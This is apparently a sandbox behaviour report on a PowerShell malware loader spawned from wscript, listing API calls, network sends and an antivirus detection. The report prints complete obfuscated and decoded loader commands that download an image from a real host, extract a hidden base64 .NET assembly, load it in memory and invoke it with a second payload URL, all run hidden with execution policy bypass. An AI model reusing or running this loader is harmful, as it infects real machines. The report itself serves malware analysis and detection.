Q◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBT◀▶HU◀▶YgBz◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶s◀▶C◀▶◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶p◀▶Ds◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶QwBv◀▶G4◀▶dgBl◀▶HI◀▶d◀▶Bd◀▶Do◀▶OgBG◀▶HI◀▶bwBt◀▶EI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶Ck◀▶Ow◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶UgBl◀▶GY◀▶b◀▶Bl◀▶GM◀▶d◀▶Bp◀▶G8◀▶bg◀▶u◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQBd◀▶Do◀▶OgBM◀▶G8◀▶YQBk◀▶Cg◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶p◀▶Ds◀▶J◀▶B0◀▶Hk◀▶c◀▶Bl◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶b◀▶Bv◀▶GE◀▶Z◀▶Bl◀▶GQ◀▶QQBz◀▶HM◀▶ZQBt◀▶GI◀▶b◀▶B5◀▶C4◀▶RwBl◀▶HQ◀▶V◀▶B5◀▶H◀▶◀▶ZQ◀▶o◀▶Cc◀▶RgBp◀▶GI◀▶ZQBy◀▶C4◀▶S◀▶Bv◀▶G0◀▶ZQ◀▶n◀▶Ck◀▶Ow◀▶k◀▶G0◀▶ZQB0◀▶Gg◀▶bwBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶u◀▶Ec◀▶ZQB0◀▶E0◀▶ZQB0◀▶Gg◀▶bwBk◀▶Cg◀▶JwBW◀▶EE◀▶SQ◀▶n◀▶Ck◀▶LgBJ◀▶G4◀▶dgBv◀▶Gs◀▶ZQ◀▶o◀▶CQ◀▶bgB1◀▶Gw◀▶b◀▶◀▶s◀▶C◀▶◀▶WwBv◀▶GI◀▶agBl◀▶GM◀▶d◀▶Bb◀▶F0◀▶XQ◀▶g◀▶Cg◀▶JwB0◀▶Hg◀▶d◀▶◀▶u◀▶DQ◀▶Mg◀▶0◀▶DM◀▶cgBn◀▶C8◀▶b◀▶B0◀▶C8◀▶Nw◀▶2◀▶DE◀▶Lg◀▶x◀▶DY◀▶MQ◀▶u◀▶DY◀▶NQ◀▶x◀▶C4◀▶N◀▶◀▶5◀▶C8◀▶Lw◀▶6◀▶H◀▶◀▶d◀▶B0◀▶Gg◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GI◀▶bwBz◀▶HQ◀▶YQ◀▶n◀▶Ck◀▶KQ◀▶='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2216
thread_handle: 0x0000032c
process_identifier: 2204
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Mw◀▶v◀▶DU◀▶MQ◀▶1◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶F8◀▶YQBu◀▶HQ◀▶aQB2◀▶G0◀▶LgBq◀▶H◀▶◀▶Zw◀▶/◀▶DE◀▶Ng◀▶5◀▶DU◀▶MQ◀▶0◀▶Dc◀▶Mg◀▶1◀▶DU◀▶Jw◀▶7◀▶CQ◀▶dwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶TgBl◀▶Hc◀▶LQBP◀▶GI◀▶agBl◀▶GM◀▶d◀▶◀▶g◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶TgBl◀▶HQ◀▶LgBX◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C4◀▶R◀▶Bv◀▶Hc◀▶bgBs◀▶G8◀▶YQBk◀▶EQ◀▶YQB0◀▶GE◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBV◀▶HI◀▶b◀▶◀▶p◀▶Ds◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶EU◀▶bgBj◀▶G8◀▶Z◀▶Bp◀▶G4◀▶ZwBd◀▶Do◀▶OgBV◀▶FQ◀▶Rg◀▶4◀▶C4◀▶RwBl◀▶HQ◀▶UwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBT◀▶FQ◀▶QQBS◀▶FQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBF◀▶E4◀▶R◀▶◀▶+◀▶D4◀▶Jw◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶KQ◀▶7◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶TwBm◀▶Cg◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶ZQ◀▶g◀▶D◀▶◀▶I◀▶◀▶t◀▶GE◀▶bgBk◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶d◀▶◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶Cs◀▶PQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶LgBM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶C◀▶◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶Ds◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBT◀▶HU◀▶YgBz◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶s◀▶C◀▶◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶p◀▶Ds◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶QwBv◀▶G4◀▶dgBl◀▶HI◀▶d◀▶Bd◀▶Do◀▶OgBG◀▶HI◀▶bwBt◀▶EI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶Ck◀▶Ow◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶UgBl◀▶GY◀▶b◀▶Bl◀▶GM◀▶d◀▶Bp◀▶G8◀▶bg◀▶u◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQBd◀▶Do◀▶OgBM◀▶G8◀▶YQBk◀▶Cg◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶p◀▶Ds◀▶J◀▶B0◀▶Hk◀▶c◀▶Bl◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶b◀▶Bv◀▶GE◀▶Z◀▶Bl◀▶GQ◀▶QQBz◀▶HM◀▶ZQBt◀▶GI◀▶b◀▶B5◀▶C4◀▶RwBl◀▶HQ◀▶V◀▶B5◀▶H◀▶◀▶ZQ◀▶o◀▶Cc◀▶RgBp◀▶GI◀▶ZQBy◀▶C4◀▶S◀▶Bv◀▶G0◀▶ZQ◀▶n◀▶Ck◀▶Ow◀▶k◀▶G0◀▶ZQB0◀▶Gg◀▶bwBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶u◀▶Ec◀▶ZQB0◀▶E0◀▶ZQB0◀▶Gg◀▶bwBk◀▶Cg◀▶JwBW◀▶EE◀▶SQ◀▶n◀▶Ck◀▶LgBJ◀▶G4◀▶dgBv◀▶Gs◀▶ZQ◀▶o◀▶CQ◀▶bgB1◀▶Gw◀▶b◀▶◀▶s◀▶C◀▶◀▶WwBv◀▶GI◀▶agBl◀▶GM◀▶d◀▶Bb◀▶F0◀▶XQ◀▶g◀▶Cg◀▶JwB0◀▶Hg◀▶d◀▶◀▶u◀▶DQ◀▶Mg◀▶0◀▶DM◀▶cgBn◀▶C8◀▶b◀▶B0◀▶C8◀▶Nw◀▶2◀▶DE◀▶Lg◀▶x◀▶DY◀▶MQ◀▶u◀▶DY◀▶NQ◀▶x◀▶C4◀▶N◀▶◀▶5◀▶C8◀▶Lw◀▶6◀▶H◀▶◀▶d◀▶B0◀▶Gg◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GI◀▶bwBz◀▶HQ◀▶YQ◀▶n◀▶Ck◀▶KQ◀▶='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000334
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Mw◀▶v◀▶DU◀▶MQ◀▶1◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶F8◀▶YQBu◀▶HQ◀▶aQB2◀▶G0◀▶LgBq◀▶H◀▶◀▶Zw◀▶/◀▶DE◀▶Ng◀▶5◀▶DU◀▶MQ◀▶0◀▶Dc◀▶Mg◀▶1◀▶DU◀▶Jw◀▶7◀▶CQ◀▶dwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶TgBl◀▶Hc◀▶LQBP◀▶GI◀▶agBl◀▶GM◀▶d◀▶◀▶g◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶TgBl◀▶HQ◀▶LgBX◀▶GU◀▶YgBD◀▶Gw◀▶aQBl◀▶G4◀▶d◀▶◀▶7◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Hc◀▶ZQBi◀▶EM◀▶b◀▶Bp◀▶GU◀▶bgB0◀▶C4◀▶R◀▶Bv◀▶Hc◀▶bgBs◀▶G8◀▶YQBk◀▶EQ◀▶YQB0◀▶GE◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBV◀▶HI◀▶b◀▶◀▶p◀▶Ds◀▶J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶V◀▶Bl◀▶Hg◀▶d◀▶◀▶u◀▶EU◀▶bgBj◀▶G8◀▶Z◀▶Bp◀▶G4◀▶ZwBd◀▶Do◀▶OgBV◀▶FQ◀▶Rg◀▶4◀▶C4◀▶RwBl◀▶HQ◀▶UwB0◀▶HI◀▶aQBu◀▶Gc◀▶K◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBC◀▶Hk◀▶d◀▶Bl◀▶HM◀▶KQ◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBT◀▶FQ◀▶QQBS◀▶FQ◀▶Pg◀▶+◀▶Cc◀▶Ow◀▶k◀▶GU◀▶bgBk◀▶EY◀▶b◀▶Bh◀▶Gc◀▶I◀▶◀▶9◀▶C◀▶◀▶Jw◀▶8◀▶Dw◀▶QgBB◀▶FM◀▶RQ◀▶2◀▶DQ◀▶XwBF◀▶E4◀▶R◀▶◀▶+◀▶D4◀▶Jw◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶D0◀▶I◀▶◀▶k◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBU◀▶GU◀▶e◀▶B0◀▶C4◀▶SQBu◀▶GQ◀▶ZQB4◀▶E8◀▶Zg◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶KQ◀▶7◀▶CQ◀▶ZQBu◀▶GQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶TwBm◀▶Cg◀▶J◀▶Bl◀▶G4◀▶Z◀▶BG◀▶Gw◀▶YQBn◀▶Ck◀▶Ow◀▶k◀▶HM◀▶d◀▶Bh◀▶HI◀▶d◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶ZQ◀▶g◀▶D◀▶◀▶I◀▶◀▶t◀▶GE◀▶bgBk◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶Gc◀▶d◀▶◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶7◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶g◀▶Cs◀▶PQ◀▶g◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶EY◀▶b◀▶Bh◀▶Gc◀▶LgBM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶7◀▶CQ◀▶YgBh◀▶HM◀▶ZQ◀▶2◀▶DQ◀▶T◀▶Bl◀▶G4◀▶ZwB0◀▶Gg◀▶I◀▶◀▶9◀▶C◀▶◀▶J◀▶Bl◀▶G4◀▶Z◀▶BJ◀▶G4◀▶Z◀▶Bl◀▶Hg◀▶I◀▶◀▶t◀▶C◀▶◀▶J◀▶Bz◀▶HQ◀▶YQBy◀▶HQ◀▶SQBu◀▶GQ◀▶ZQB4◀▶Ds◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶aQBt◀▶GE◀▶ZwBl◀▶FQ◀▶ZQB4◀▶HQ◀▶LgBT◀▶HU◀▶YgBz◀▶HQ◀▶cgBp◀▶G4◀▶Zw◀▶o◀▶CQ◀▶cwB0◀▶GE◀▶cgB0◀▶Ek◀▶bgBk◀▶GU◀▶e◀▶◀▶s◀▶C◀▶◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BM◀▶GU◀▶bgBn◀▶HQ◀▶a◀▶◀▶p◀▶Ds◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶QwBv◀▶G4◀▶dgBl◀▶HI◀▶d◀▶Bd◀▶Do◀▶OgBG◀▶HI◀▶bwBt◀▶EI◀▶YQBz◀▶GU◀▶Ng◀▶0◀▶FM◀▶d◀▶By◀▶Gk◀▶bgBn◀▶Cg◀▶J◀▶Bi◀▶GE◀▶cwBl◀▶DY◀▶N◀▶BD◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶Ck◀▶Ow◀▶k◀▶Gw◀▶bwBh◀▶GQ◀▶ZQBk◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQ◀▶g◀▶D0◀▶I◀▶Bb◀▶FM◀▶eQBz◀▶HQ◀▶ZQBt◀▶C4◀▶UgBl◀▶GY◀▶b◀▶Bl◀▶GM◀▶d◀▶Bp◀▶G8◀▶bg◀▶u◀▶EE◀▶cwBz◀▶GU◀▶bQBi◀▶Gw◀▶eQBd◀▶Do◀▶OgBM◀▶G8◀▶YQBk◀▶Cg◀▶J◀▶Bj◀▶G8◀▶bQBt◀▶GE◀▶bgBk◀▶EI◀▶eQB0◀▶GU◀▶cw◀▶p◀▶Ds◀▶J◀▶B0◀▶Hk◀▶c◀▶Bl◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶b◀▶Bv◀▶GE◀▶Z◀▶Bl◀▶GQ◀▶QQBz◀▶HM◀▶ZQBt◀▶GI◀▶b◀▶B5◀▶C4◀▶RwBl◀▶HQ◀▶V◀▶B5◀▶H◀▶◀▶ZQ◀▶o◀▶Cc◀▶RgBp◀▶GI◀▶ZQBy◀▶C4◀▶S◀▶Bv◀▶G0◀▶ZQ◀▶n◀▶Ck◀▶Ow◀▶k◀▶G0◀▶ZQB0◀▶Gg◀▶bwBk◀▶C◀▶◀▶PQ◀▶g◀▶CQ◀▶d◀▶B5◀▶H◀▶◀▶ZQ◀▶u◀▶Ec◀▶ZQB0◀▶E0◀▶ZQB0◀▶Gg◀▶bwBk◀▶Cg◀▶JwBW◀▶EE◀▶SQ◀▶n◀▶Ck◀▶LgBJ◀▶G4◀▶dgBv◀▶Gs◀▶ZQ◀▶o◀▶CQ◀▶bgB1◀▶Gw◀▶b◀▶◀▶s◀▶C◀▶◀▶WwBv◀▶GI◀▶agBl◀▶GM◀▶d◀▶Bb◀▶F0◀▶XQ◀▶g◀▶Cg◀▶JwB0◀▶Hg◀▶d◀▶◀▶u◀▶DQ◀▶Mg◀▶0◀▶DM◀▶cgBn◀▶C8◀▶b◀▶B0◀▶C8◀▶Nw◀▶2◀▶DE◀▶Lg◀▶x◀▶DY◀▶MQ◀▶u◀▶DY◀▶NQ◀▶x◀▶C4◀▶N◀▶◀▶5◀▶C8◀▶Lw◀▶6◀▶H◀▶◀▶d◀▶B0◀▶Gg◀▶Jw◀▶g◀▶Cw◀▶I◀▶◀▶n◀▶GI◀▶bwBz◀▶HQ◀▶YQ◀▶n◀▶Ck◀▶KQ◀▶='";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64string( $codigo.replace('◀▶','A') ))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2320
thread_handle: 0x00000438
process_identifier: 2312
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/613/515/original/rump_vbs_antivm.jpg?1695147255';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.4243rg/lt/761.161.651.49//:ptth' , 'bosta'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000043c
1 1 0
Kaspersky HEUR:Trojan.Script.Generic
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received We ­»¡Ësh$k%B(§Ûö²¬`übYDOWNGRD \.¥Mm¨MGí ÔlÔù C£ƒÑAˆc¿dîDÀ ÿ 
Data received P
Data received ‘
Data received A¯«Ñ铌[å3&*Vƒ2¶užQ4ë0¦YrpÚÝùK‹%e\-íKÕ@.ãŠó•y¾ ˆ‡VÒ@ˆ" %F0D eœðt›%0‰ínQ¥q:þã®:’pF_`iF c³%¿ :宔$ñ"ö*#£¸`3.1ªFà0dƒîDÙ^犒
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received ‰ýJ-#£9j4&ý흌¤Ÿ9ŠÎ}Êîrͳ5ÛÙºj’¸ª·_£lÇ*¥'œ
Data sent yue Ÿ³ŽT_XMyÇA ’‘ïF/ç{QÂy¸ùB/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBA«Z @=Ö¸JC)Ðê-Ñ5ç¥3OxÞÊÕ#HÕ–­&{V”$GÝb´ûqnÕ8WÆjÀs¬æÌϛ® 0•kÜ(â×ÇcØ^!:J'G Vuþ}õwäÿ¹\°:±Û‘Žg¬{1g1
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

send

buffer: yue Ÿ³ŽT_XMyÇA ’‘ïF/ç{QÂy¸ùB/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1432
sent: 126
1 126 0

send

buffer: FBA«Z @=Ö¸JC)Ðê-Ñ5ç¥3OxÞÊÕ#HÕ–­&{V”$GÝb´ûqnÕ8WÆjÀs¬æÌϛ® 0•kÜ(â×ÇcØ^!:J'G Vuþ}õwäÿ¹\°:±Û‘Žg¬{1g1
socket: 1432
sent: 134
1 134 0

WSASend

buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2020
0 0
parent_process wscript.exe martian_process powershell -command "$Codigo = 'J◀▶Bp◀▶G0◀▶YQBn◀▶GU◀▶VQBy◀▶Gw◀▶I◀▶◀▶9◀▶C◀▶◀▶JwBo◀▶HQ◀▶d◀▶Bw◀▶HM◀▶Og◀▶v◀▶C8◀▶dQBw◀▶Gw◀▶bwBh◀▶GQ◀▶Z◀▶Bl◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBu◀▶HM◀▶LgBj◀▶G8◀▶bQ◀▶u◀▶GI◀▶cg◀▶v◀▶Gk◀▶bQBh◀▶Gc◀▶ZQBz◀▶C8◀▶M◀▶◀▶w◀▶DQ◀▶Lw◀▶2◀▶DE◀▶Mw◀▶v◀▶DU◀▶MQ◀▶1◀▶C8◀▶bwBy◀▶Gk◀▶ZwBp◀▶G4◀▶YQBs◀▶C8◀▶cgB1◀▶G0◀▶c◀▶Bf◀▶HY◀▶YgBz◀▶F8◀▶YQBu◀▶HQ◀▶aQB2◀▶G0◀▶LgBq◀▶H◀▶◀▶Zw◀▶/◀▶DE◀▶Ng◀▶5◀▶DU◀▶MQ◀▶0◀▶Dc◀▶Mg◀▶1◀▶DU◀▶Jw◀▶7◀▶CQ◀▶dwBl◀▶GI◀▶QwBs◀▶Gk◀▶ZQBu◀▶HQ◀▶I◀▶◀▶9◀▶C◀▶◀▶TgBl◀▶Hc◀▶LQBP◀▶GI◀▶agBl◀▶GM◀▶d◀▶◀▶g